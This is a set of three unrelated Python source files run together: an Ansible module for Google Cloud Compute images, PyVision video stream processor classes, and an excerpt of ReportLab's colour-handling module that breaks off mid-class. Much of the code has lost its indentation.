will not change unless the client explicitly changes it.
returned: success
type: str
deprecated:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to DEPRECATED. This is only informational and the status
will not change unless the client explicitly changes it.
returned: success
type: str
obsolete:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to OBSOLETE. This is only informational and the status
will not change unless the client explicitly changes it.
returned: success
type: str
replacement:
description:
- The URL of the suggested replacement for a deprecated resource.
- The suggested replacement resource must be the same kind of resource as the
deprecated resource.
returned: success
type: str
state:
description:
- The deprecation state of this resource. This can be DEPRECATED, OBSOLETE,
or DELETED. Operations which create a new resource using a DEPRECATED resource
will return successfully, but with a warning indicating the deprecated resource
and recommending its replacement. Operations which use OBSOLETE or DELETED
resources will be rejected and result in an error.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
diskSizeGb:
description:
- Size of the image when restored onto a persistent disk (in GB).
returned: success
type: int
family:
description:
- The name of the image family to which this image belongs. You can create disks
by specifying an image family instead of a specific image name. The image family
always returns its latest image that is not deprecated. The name of the image
family must comply with RFC1035.
returned: success
type: str
guestOsFeatures:
description:
- A list of features to enable on the guest operating system.
- Applicable only for bootable images.
returned: success
type: complex
contains:
type:
description:
- The type of supported feature.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the server.
returned: success
type: int
imageEncryptionKey:
description:
- Encrypts the image using a customer-supplied encryption key.
  - After you encrypt an image with a customer-supplied key, you must provide the
    same key if you use the image later (e.g. to create a disk from the image).
returned: success
type: complex
contains:
rawKey:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
returned: success
type: str
sha256:
description:
- The RFC 4648 base64 encoded SHA-256 hash of the customer-supplied encryption
key that protects this resource.
returned: success
type: str
labels:
description:
- Labels to apply to this Image.
returned: success
type: dict
labelFingerprint:
description:
- The fingerprint used for optimistic locking of this resource. Used internally
during updates.
returned: success
type: str
licenses:
description:
- Any applicable license URI.
returned: success
type: list
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
rawDisk:
description:
- The parameters of the raw disk image.
returned: success
type: complex
contains:
containerType:
description:
- The format used to encode and transmit the block device, which should be TAR.
This is just a container and transmission format and not a runtime format.
Provided by the client when the disk image is created.
returned: success
type: str
sha1Checksum:
description:
- An optional SHA1 checksum of the disk image before unpackaging.
- This is provided by the client when the disk image is created.
returned: success
type: str
source:
description:
  - The full Google Cloud Storage URL where the disk image is stored. You must provide
    either this property or the sourceDisk property but not both.
returned: success
type: str
sourceDisk:
description:
- The source disk to create this image based on.
- You must provide either this property or the rawDisk.source property but not both
to create an image.
returned: success
type: dict
sourceDiskEncryptionKey:
description:
- The customer-supplied encryption key of the source disk. Required if the source
disk is protected by a customer-supplied encryption key.
returned: success
type: complex
contains:
rawKey:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
returned: success
type: str
sha256:
description:
- The RFC 4648 base64 encoded SHA-256 hash of the customer-supplied encryption
key that protects this resource.
returned: success
type: str
sourceDiskId:
description:
- The ID value of the disk used to create this image. This value may be used to
determine whether the image was taken from the current or a previous instance
of a given disk name.
returned: success
type: str
sourceType:
description:
- The type of the image used to create this disk. The default and only value is
    RAW.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
description=dict(type='str'),
disk_size_gb=dict(type='int'),
family=dict(type='str'),
guest_os_features=dict(type='list', elements='dict', options=dict(type=dict(type='str'))),
image_encryption_key=dict(type='dict', options=dict(raw_key=dict(type='str'))),
labels=dict(type='dict'),
licenses=dict(type='list', elements='str'),
name=dict(required=True, type='str'),
raw_disk=dict(type='dict', options=dict(container_type=dict(type='str'), sha1_checksum=dict(type='str'), source=dict(required=True, type='str'))),
source_disk=dict(type='dict'),
source_disk_encryption_key=dict(type='dict', options=dict(raw_key=dict(type='str'))),
source_disk_id=dict(type='str'),
source_type=dict(type='str'),
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#image'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind, fetch)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
update_fields(module, resource_to_request(module), response_to_hash(module, fetch))
return fetch_resource(module, self_link(module), kind)
def update_fields(module, request, response):
if response.get('labels') != request.get('labels'):
labels_update(module, request, response)
def labels_update(module, request, response):
auth = GcpSession(module, 'compute')
auth.post(
''.join(["https://www.googleapis.com/compute/v1/", "projects/{project}/global/images/{name}/setLabels"]).format(**module.params),
{u'labels': module.params.get('labels'), u'labelFingerprint': response.get('labelFingerprint')},
)
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#image',
u'description': module.params.get('description'),
u'diskSizeGb': module.params.get('disk_size_gb'),
u'family': module.params.get('family'),
u'guestOsFeatures': ImageGuestosfeaturesArray(module.params.get('guest_os_features', []), module).to_request(),
u'imageEncryptionKey': ImageImageencryptionkey(module.params.get('image_encryption_key', {}), module).to_request(),
u'labels': module.params.get('labels'),
u'licenses': module.params.get('licenses'),
u'name': module.params.get('name'),
u'rawDisk': ImageRawdisk(module.params.get('raw_disk', {}), module).to_request(),
u'sourceDisk': replace_resource_dict(module.params.get(u'source_disk', {}), 'selfLink'),
u'sourceDiskEncryptionKey': ImageSourcediskencryptionkey(module.params.get('source_disk_encryption_key', {}), module).to_request(),
u'sourceDiskId': module.params.get('source_disk_id'),
u'sourceType': module.params.get('source_type'),
}
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/images/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/images".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'archiveSizeBytes': response.get(u'archiveSizeBytes'),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'deprecated': ImageDeprecated(response.get(u'deprecated', {}), module).from_response(),
u'description': response.get(u'description'),
u'diskSizeGb': response.get(u'diskSizeGb'),
u'family': response.get(u'family'),
u'guestOsFeatures': ImageGuestosfeaturesArray(response.get(u'guestOsFeatures', []), module).from_response(),
u'id': response.get(u'id'),
u'imageEncryptionKey': ImageImageencryptionkey(response.get(u'imageEncryptionKey', {}), module).from_response(),
u'labels': response.get(u'labels'),
u'labelFingerprint': response.get(u'labelFingerprint'),
u'licenses': response.get(u'licenses'),
u'name': response.get(u'name'),
u'rawDisk': ImageRawdisk(response.get(u'rawDisk', {}), module).from_response(),
u'sourceDisk': response.get(u'sourceDisk'),
u'sourceDiskEncryptionKey': ImageSourcediskencryptionkey(response.get(u'sourceDiskEncryptionKey', {}), module).from_response(),
u'sourceDiskId': response.get(u'sourceDiskId'),
u'sourceType': response.get(u'sourceType'),
}
def license_selflink(name, params):
if name is None:
return
url = r"https://www.googleapis.com/compute/v1//projects/.*/global/licenses/.*"
if not re.match(url, name):
name = "https://www.googleapis.com/compute/v1//projects/{project}/global/licenses/%s".format(**params) % name
return name
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#image')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation', False)
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class ImageDeprecated(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'deleted': self.request.get('deleted'),
u'deprecated': self.request.get('deprecated'),
u'obsolete': self.request.get('obsolete'),
u'replacement': self.request.get('replacement'),
u'state': self.request.get('state'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'deleted': self.request.get(u'deleted'),
u'deprecated': self.request.get(u'deprecated'),
u'obsolete': self.request.get(u'obsolete'),
u'replacement': self.request.get(u'replacement'),
u'state': self.request.get(u'state'),
}
)
class ImageGuestosfeaturesArray(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = []
def to_request(self):
items = []
for item in self.request:
items.append(self._request_for_item(item))
return items
def from_response(self):
items = []
for item in self.request:
items.append(self._response_from_item(item))
return items
def _request_for_item(self, item):
return remove_nones_from_dict({u'type': item.get('type')})
def _response_from_item(self, item):
return remove_nones_from_dict({u'type': item.get(u'type')})
class ImageImageencryptionkey(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'rawKey': self.request.get('raw_key')})
def from_response(self):
return remove_nones_from_dict({u'rawKey': self.request.get(u'rawKey')})
class ImageRawdisk(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'containerType': self.request.get('container_type'), u'sha1Checksum': self.request.get('sha1_checksum'), u'source': self.request.get('source')}
)
def from_response(self):
return remove_nones_from_dict(
{u'containerType': self.request.get(u'containerType'), u'sha1Checksum': self.request.get(u'sha1Checksum'), u'source': self.request.get(u'source')}
)
class ImageSourcediskencryptionkey(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'rawKey': self.request.get('raw_key')})
def from_response(self):
return remove_nones_from_dict({u'rawKey': self.request.get(u'rawKey')})
if __name__ == '__main__':
main()
|
|
'''
Created on Mar 18, 2011
@author: svohara
'''
# PyVision License
#
# Copyright (c) 2006-2008 Stephen O'Hara
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pyvision as pv
import cv2.cv as cv
'''
This module implements various Video Stream Processors, or VSPs for short.
A VSP is designed to encapsulate a per-frame operation that can be
applied to a video stream. Examples include displaying the image while
overlaying the frame number (SimpleVSP), writing the output of a video
stream to a video file (VideoWriterVSP), and performing motion detection
on each video frame (MotionDetectionVSP).
The general idea is to chain together a VSP sequence, and then attach
the head of the chain to a video's play method. We hope that users will
create and/or contribute many useful subclasses of AbstractVSP.
For example:
import pyvision as pv
vsp_write = pv.VideoWriterVSP('tmp.avi',size=(640,480))
vsp_disp = pv.SimpleVSP(window="Display", nextModule=vsp_write)
vid = pv.Video(sourceFile)
vid.play(window=None, delay=25, onNewFrame=vsp_disp)
'''
VSP_SWALLOW_IMG = -1  # special return value from _onNewFrame indicating that the frame should be swallowed, and not passed downstream
class AbstractVSP():
'''AbstractVSP is the abstract class definition of a
Video Stream Processor (VSP) object. VSP's are designed to be chained
together to accomplish processing on a video stream.
'''
def __init__(self, window=None, nextModule=None):
''' Constructor
@param window: The window name to use when displaying this VSP's
output. Specify None to suppress showing the output, but note that
if you modify the current image with annotations, those will be
persisted "downstream" to later processors.
@param nextModule: A Video Stream Processor object that should be
invoked on every frame after this processor has finished.
'''
self._windowName = window
self._nextModule = nextModule
    def __call__(self, img, fn, **kwargs):
        rc = self._onNewFrame(img, fn, **kwargs)
        if isinstance(rc, (list, tuple)):
            # then we should have (newImg, newFn)
            (newImg, fn) = rc  # we overwrite the fn parameter that downstream modules will see
        else:
            # rc should be just newImg to pass on to the next module
            newImg = rc
        if newImg == VSP_SWALLOW_IMG:
            # special return indicates that the nextModule should
            # not be called at this iteration...the current input image
            # should be swallowed with no output
            pass
        else:
            if self._nextModule is not None:
                if newImg is not None:
                    # we have a new image to replace the current one in-stream
                    kwargs['orig_img'] = img  # add a keyword arg to allow access to the original img
                    self._nextModule(newImg, fn, **kwargs)
                else:
                    self._nextModule(img, fn, **kwargs)
def _onNewFrame(self, img, fn, **kwargs):
''' Override this abstract method with the processing your object
performs on a per-frame basis. It is recommended that you do not
directly call this method. Rather, the VSP is a callable object,
and so the __call__ method takes care of invoking this method as
well as calling the next module, if any.
'''
        raise NotImplementedError
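# Illustrative sketch (not part of the original module): a minimal custom VSP
# subclass of the kind the module docstring invites users to contribute.
class GrayscaleVSP(AbstractVSP):
    '''Converts each frame to grayscale before passing it downstream.
    Assumes pv.Image accepts the OpenCV buffer returned by asOpenCVBW(),
    mirroring how VideoWriterVSP uses asOpenCV()/asOpenCVBW().
    '''
    def _onNewFrame(self, img, fn, **kwargs):
        gray = pv.Image(img.asOpenCVBW())  # grayscale copy of the input frame
        if self._windowName != None: gray.show(window=self._windowName, delay=1)
        return gray  # downstream modules receive the grayscale image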
class FrameNumberVSP(AbstractVSP):
    '''This VSP displays the input video frame with a simple annotation
    showing the frame number in the upper left corner.
    NOTE: The vid.play(...) method will automatically add a frame number
    annotation to the source image, which can be problematic for downstream
    processing. Instead, call vid.play(...,annotate=False) to suppress
    the frame number display, and then use this FrameNumberVSP as a final
    step to put the frame number on the video after any processing has
    occurred.
    '''
def __init__(self, display_pad=4, window=None, nextModule=None):
'''
Constructor
@param display_pad: Pads the frame number with leading zeros
in order to have at least this many digits.
'''
self.pad = display_pad
AbstractVSP.__init__(self, window, nextModule)
def _onNewFrame(self, img, fn, **kwargs):
pt = pv.Point(10, 10)
img.annotateLabel(label="Frame: %s"%str(fn+1).zfill(self.pad), point=pt, color="white", background="black")
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
#TODO: There seems to be a bug in the video writing output when writing
# frames from some source video objects in some output sizes. The symptom
# appears as an output video that is "slanted" and grainy.
class VideoWriterVSP(AbstractVSP):
'''
A video stream processor that outputs to a new movie file.
If you want to display the frame number in the output, chain this VSP
after a SimpleVSP object in the series.
'''
def __init__(self, filename, window="Input", nextModule=None, fourCC_str="XVID", fps=15, size=None, bw=False,
no_annotations = False):
'''
Constructor
@param filename: The full output filename. Include the extension, such as .avi.
@param window: The window name to use when displaying this VSP's
output. Specify None to suppress showing the output, but note that
if you modify the current image with annotations, those will be
persisted "downstream" to later processors.
@param nextModule: A Video Stream Processor object that should be
invoked on every frame after this processor has finished.
@param fourCC_str: The "Four CC" string that is used to specify the encoder.
@param fps: Frames per second. Not all codecs allow you to specify arbitrary frame rates, however.
@param size: A tuple (w,h) representing the size of the output frames.
@param bw: Specify true if you wish for a black-and-white only output.
@param no_annotations: set to True to output the original, non-annotated version of the image
'''
cvFourCC = cv.CV_FOURCC(*fourCC_str)
if bw:
colorFlag = cv.CV_LOAD_IMAGE_GRAYSCALE
else:
colorFlag = cv.CV_LOAD_IMAGE_UNCHANGED
self._bw = bw
self._out = cv.CreateVideoWriter(filename, cvFourCC, fps, size, colorFlag)
self._no_annotations = no_annotations
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def addFrame(self, img):
'''
@param img: A pyvision img to write out to the video.
'''
if self._no_annotations:
img2 = img
else:
img2 = pv.Image(img.asAnnotated())
if self._bw:
cv.WriteFrame(self._out, img2.asOpenCVBW())
else:
cv.WriteFrame(self._out, img2.asOpenCV())
def _onNewFrame(self, img, fn, **kwargs):
self.addFrame(img)
return img
class ResizerVSP(AbstractVSP):
'''This VSP resizes each frame of video. Subsequent VSPs in a chain
will see the resized image instead of the original.
'''
def __init__(self, new_size=(320,240), window="Resized Image", nextModule=None):
self._newSize = new_size
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
img = img.resize(self._newSize)
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
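# Illustrative usage (a sketch; sourceFile is a placeholder path): chain a
# ResizerVSP into a VideoWriterVSP so a resized copy of the stream is recorded.
#   writer = VideoWriterVSP('tmp_small.avi', window=None, size=(320, 240))
#   resizer = ResizerVSP(new_size=(320, 240), window=None, nextModule=writer)
#   vid = pv.Video(sourceFile)
#   vid.play(window=None, delay=25, annotate=False, onNewFrame=resizer)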
class FrameSkipperVSP(AbstractVSP):
'''
This is a video stream processor that is used to skip every k frames
in a source video. You might put this vsp as the first step in processing
if you need to adjust a 60fps video, for example, to skip every other frame
so that downstream processing sees 30fps input.
Downstream modules will see a renumbered video stream. For example, if every-other
frame was being skipped, the nextModule would still see its frame number input as 0,1,2,3,...
even though in reality it is receiving frames 0,2,4,... from the source video.
'''
def __init__(self, skip_param=0, nextModule=None):
'''
Constructor
        @param skip_param: If 0, then no frames are skipped. Otherwise a frame
        is skipped if (frame_number + 1) modulo skip_param == 0. For example, with
        a skip_param of 2, frames 1,3,5,7,... will be dropped.
'''
self.skip_param = skip_param
if skip_param == 1:
print "Warning, you specified a skip_param of 1 for the frame skipper VSP."
print "This means ALL frames will be suppressed."
        AbstractVSP.__init__(self, window=None, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
if self.skip_param == 0:
#special case, do nothing
return img
if ( (fn+1) % self.skip_param ) == 0:
return VSP_SWALLOW_IMG
else:
newFn = int( round( (1 - (1.0/self.skip_param))*fn) )
return (img, newFn) #let this one through, provide new frame number
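# Illustrative usage (a sketch): halve a 60fps source so downstream modules see
# roughly 30fps, renumbered 0,1,2,... With skip_param=2, source frames 1,3,5,...
# are swallowed and source frame 2 arrives downstream as fn=1.
#   skipper = FrameSkipperVSP(skip_param=2, nextModule=some_downstream_vsp)
#   pv.Video(sourceFile).play(window=None, annotate=False, onNewFrame=skipper)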
class MotionDetectionVSP(AbstractVSP):
''' This VSP uses an existing motion detection object to apply motion
detection to each frame of video.
'''
def __init__(self, md_object, window="Motion Detection", nextModule=None):
''' Constructor
@param md_object: The pyvision motion detection object to be used by
this VSP
@param window: The name of the output window. Use None to suppress output.
@param nextModule: The next VSP, if any, to be called by this VSP.
'''
self._md = md_object
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
''' Performs motion detection using this object's md object,
displays the foreground pixels to a window.
'''
md = self._md
rc = md.detect(img)
if rc > -1:
md.annotateFrame(img, rect_color="yellow", contour_color=None, flow_color=None)
if self._windowName != None: img.show(window=self._windowName, delay=1)
#img_fg = md.getForegroundPixels()
#img_fg.show("Foreground")
return img
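# Illustrative usage (a sketch): pv.MotionDetector is assumed as the motion
# detection object here; any object exposing detect() and annotateFrame() works.
#   md_vsp = MotionDetectionVSP(pv.MotionDetector(), window="Motion Detection")
#   pv.Video(sourceFile).play(window=None, annotate=False, onNewFrame=md_vsp)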
class PeopleDetectionVSP(AbstractVSP):
''' This Video Stream Processor applies the OpenCV HOG people detector
to each frame of video, annotating the detections with red rectangles.
'''
def _onNewFrame(self, img, fn, **kwargs):
rects = self._detectPeople(img)
for r in rects: img.annotateRect(r)
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
def _detectPeople(self, img):
cvim = img.asOpenCV() #convert to OpenCV format before using OpenCV functions
rect_list = []
try:
found = list(cv.HOGDetectMultiScale(cvim, cv.CreateMemStorage(0)))
rect_list = [ pv.Rect(x,y,w,h) for ((x,y),(w,h)) in found] #python list comprehension
except:
#cv.HOGDetectMultiScale can throw exceptions, so return empty list
return []
return rect_list
|
|
#Copyright ReportLab Europe Ltd. 2000-2010
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/lib/colors.py
__version__=''' $Id: colors.py 3780 2010-09-17 13:40:59Z rgbecker $ '''
__doc__='''Defines standard colour-handling classes and colour names.
We define standard classes to hold colours in two models: RGB and CMYK.
These can be constructed from several popular formats. We also include
- pre-built colour objects for the HTML standard colours
- pre-built colours used in ReportLab's branding
- various conversion and construction functions
'''
import math
from reportlab.lib.utils import fp_str
class Color:
"""This class is used to represent color. Components red, green, blue
are in the range 0 (dark) to 1 (full intensity)."""
def __init__(self, red=0, green=0, blue=0, alpha=1):
"Initialize with red, green, blue in range [0-1]."
self.red = red
self.green = green
self.blue = blue
self.alpha = alpha
def __repr__(self):
return "Color(%s)" % fp_str(*(self.red, self.green, self.blue,self.alpha)).replace(' ',',')
def __hash__(self):
return hash((self.red, self.green, self.blue, self.alpha))
def __cmp__(self,other):
'''simple comparison by component; cmyk != color ever
>>> cmp(Color(0,0,0),None)
-1
>>> cmp(Color(0,0,0),black)
0
>>> cmp(Color(0,0,0),CMYKColor(0,0,0,1)),Color(0,0,0).rgba()==CMYKColor(0,0,0,1).rgba()
(-1, True)
'''
if isinstance(other,CMYKColor) or not isinstance(other,Color): return -1
try:
return cmp((self.red, self.green, self.blue, self.alpha),
(other.red, other.green, other.blue, other.alpha))
except:
return -1
return 0
def rgb(self):
"Returns a three-tuple of components"
return (self.red, self.green, self.blue)
def rgba(self):
"Returns a four-tuple of components"
return (self.red, self.green, self.blue, self.alpha)
def bitmap_rgb(self):
return tuple(map(lambda x: int(x*255)&255, self.rgb()))
def bitmap_rgba(self):
return tuple(map(lambda x: int(x*255)&255, self.rgba()))
def hexval(self):
return '0x%02x%02x%02x' % self.bitmap_rgb()
def hexvala(self):
return '0x%02x%02x%02x%02x' % self.bitmap_rgba()
_cKwds='red green blue alpha'.split()
def cKwds(self):
for k in self._cKwds:
yield k,getattr(self,k)
cKwds=property(cKwds)
def clone(self,**kwds):
'''copy then change values in kwds'''
D = dict([kv for kv in self.cKwds])
D.update(kwds)
return self.__class__(**D)
def _lookupName(self,D={}):
if not D:
for n,v in getAllNamedColors().iteritems():
if not isinstance(v,CMYKColor):
t = v.red,v.green,v.blue
if t in D:
n = n+'/'+D[t]
D[t] = n
t = self.red,self.green,self.blue
return t in D and D[t] or None
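# Illustrative usage (a sketch): clone() copies a colour while overriding any
# of the component keywords listed in _cKwds, e.g.
#   half_red = Color(1, 0, 0).clone(alpha=0.5)   # same RGB components, new alpha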
class CMYKColor(Color):
"""This represents colors using the CMYK (cyan, magenta, yellow, black)
model commonly used in professional printing. This is implemented
as a derived class so that renderers which only know about RGB "see it"
as an RGB color through its 'red','green' and 'blue' attributes, according
to an approximate function.
    The RGB approximation is worked out when the object is constructed, so
    the color attributes should not be changed afterwards.
Extra attributes may be attached to the class to support specific ink models,
and renderers may look for these."""
_scale = 1.0
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=1, knockout=None, alpha=1):
"""
        Initialize with four colors in range [0-1]. The optional
spotName, density & knockout may be of use to specific renderers.
spotName is intended for use as an identifier to the renderer not client programs.
density is used to modify the overall amount of ink.
knockout is a renderer dependent option that determines whether the applied colour
        knocks out (removes) existing colour; None means use the global default.
"""
self.cyan = cyan
self.magenta = magenta
self.yellow = yellow
self.black = black
self.spotName = spotName
self.density = max(min(density,1),0) # force into right range
self.knockout = knockout
self.alpha = alpha
        # now work out the RGB approximation; this overrides the inherited red/green/blue attributes
self.red, self.green, self.blue = cmyk2rgb( (cyan, magenta, yellow, black) )
if density<1:
#density adjustment of rgb approximants, effectively mix with white
r, g, b = self.red, self.green, self.blue
r = density*(r-1)+1
g = density*(g-1)+1
b = density*(b-1)+1
self.red, self.green, self.blue = (r,g,b)
def __repr__(self):
return "%s(%s%s%s%s%s)" % (self.__class__.__name__,
fp_str(self.cyan, self.magenta, self.yellow, self.black).replace(' ',','),
(self.spotName and (',spotName='+repr(self.spotName)) or ''),
(self.density!=1 and (',density='+fp_str(self.density)) or ''),
(self.knockout is not None and (',knockout=%d' % self.knockout) or ''),
(self.alpha is not None and (',alpha=%s' % self.alpha) or ''),
)
def fader(self, n, reverse=False):
'''return n colors based on density fade
        *NB* note this doesn't reach density zero'''
scale = self._scale
dd = scale/float(n)
L = [self.clone(density=scale - i*dd) for i in xrange(n)]
if reverse: L.reverse()
return L
def __hash__(self):
return hash( (self.cyan, self.magenta, self.yellow, self.black, self.density, self.spotName, self.alpha) )
def __cmp__(self,other):
"""obvious way to compare colours
Comparing across the two color models is of limited use.
>>> cmp(CMYKColor(0,0,0,1),None)
-1
>>> cmp(CMYKColor(0,0,0,1),_CMYK_black)
0
>>> cmp(PCMYKColor(0,0,0,100),_CMYK_black)
0
>>> cmp(CMYKColor(0,0,0,1),Color(0,0,1)),Color(0,0,0).rgba()==CMYKColor(0,0,0,1).rgba()
(-1, True)
"""
if not isinstance(other, CMYKColor): return -1
try:
return cmp(
(self.cyan, self.magenta, self.yellow, self.black, self.density, self.alpha, self.spotName),
(other.cyan, other.magenta, other.yellow, other.black, other.density, other.alpha, other.spotName))
except: # or just return 'not equal' if not a color
return -1
return 0
def cmyk(self):
"Returns a tuple of four color components - syntactic sugar"
return (self.cyan, self.magenta, self.yellow, self.black)
def cmyka(self):
"Returns a tuple of five color components - syntactic sugar"
return (self.cyan, self.magenta, self.yellow, self.black, self.alpha)
def _density_str(self):
return fp_str(self.density)
_cKwds='cyan magenta yellow black density alpha spotName knockout'.split()
def _lookupName(self,D={}):
if not D:
for n,v in getAllNamedColors().iteritems():
if isinstance(v,CMYKColor):
t = v.cyan,v.magenta,v.yellow,v.black
if t in D:
n = n+'/'+D[t]
D[t] = n
t = self.cyan,self.magenta,self.yellow,self.black
return t in D and D[t] or None
class PCMYKColor(CMYKColor):
'''100 based CMYKColor with density and a spotName; just like Rimas uses'''
_scale = 100.
def __init__(self,cyan,magenta,yellow,black,density=100,spotName=None,knockout=None,alpha=100):
CMYKColor.__init__(self,cyan/100.,magenta/100.,yellow/100.,black/100.,spotName,density/100.,knockout=knockout,alpha=alpha/100.)
def __repr__(self):
return "%s(%s%s%s%s%s)" % (self.__class__.__name__,
fp_str(self.cyan*100, self.magenta*100, self.yellow*100, self.black*100).replace(' ',','),
(self.spotName and (',spotName='+repr(self.spotName)) or ''),
(self.density!=1 and (',density='+fp_str(self.density*100)) or ''),
(self.knockout is not None and (',knockout=%d' % self.knockout) or ''),
(self.alpha is not None and (',alpha=%s' % (fp_str(self.alpha*100))) or ''),
)
def cKwds(self):
K=self._cKwds
S=K[:6]
for k in self._cKwds:
v=getattr(self,k)
if k in S: v*=100
yield k,v
cKwds=property(cKwds)
class CMYKColorSep(CMYKColor):
'''special case color for making separating pdfs'''
_scale = 1.
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=1,alpha=1):
